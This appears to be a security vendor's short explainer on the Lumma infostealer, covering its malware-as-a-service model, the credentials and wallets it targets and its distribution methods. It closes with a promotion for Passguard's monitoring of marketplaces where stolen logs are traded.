Short answer

Lumma is the most dominant infostealer in 2025. Known for rapid development, modular payloads, and advanced evasion features, Lumma has overtaken RedLine as the most widely deployed credential stealer. It operates as Malware-as-a-Service (MaaS) and is actively sold on Telegram.

Why Lumma dominates

Lumma's success comes from constant development: its operators release frequent updates with new evasion techniques, additional data targets, and improved exfiltration methods. The stealer is modular, operators can configure which data types to steal and how to deliver payloads. Its MaaS model makes it accessible to a wide range of attackers.

What Lumma steals

Lumma targets browser-stored credentials, session tokens and cookies, cryptocurrency wallets, browser extensions, autofill data, and system information. Some variants also capture screenshots and clipboard data. The breadth of data collection makes Lumma logs particularly valuable on criminal marketplaces.

Distribution methods

Lumma is distributed through cracked software downloads, malvertising campaigns, phishing emails, and SEO poisoning. Some campaigns use fake CAPTCHA pages that trick users into executing PowerShell commands that download the malware.

How Passguard detects Lumma

Passguard monitors the criminal marketplaces and Telegram channels where Lumma logs are traded. When infected devices with stolen sessions linked to your organization are listed for sale, Passguard alerts your security team with the details needed to act: device information, malware type, compromised sessions, and infection timeline. Run a free scan at passguard.com to see if Lumma logs referencing your domain are already in circulation.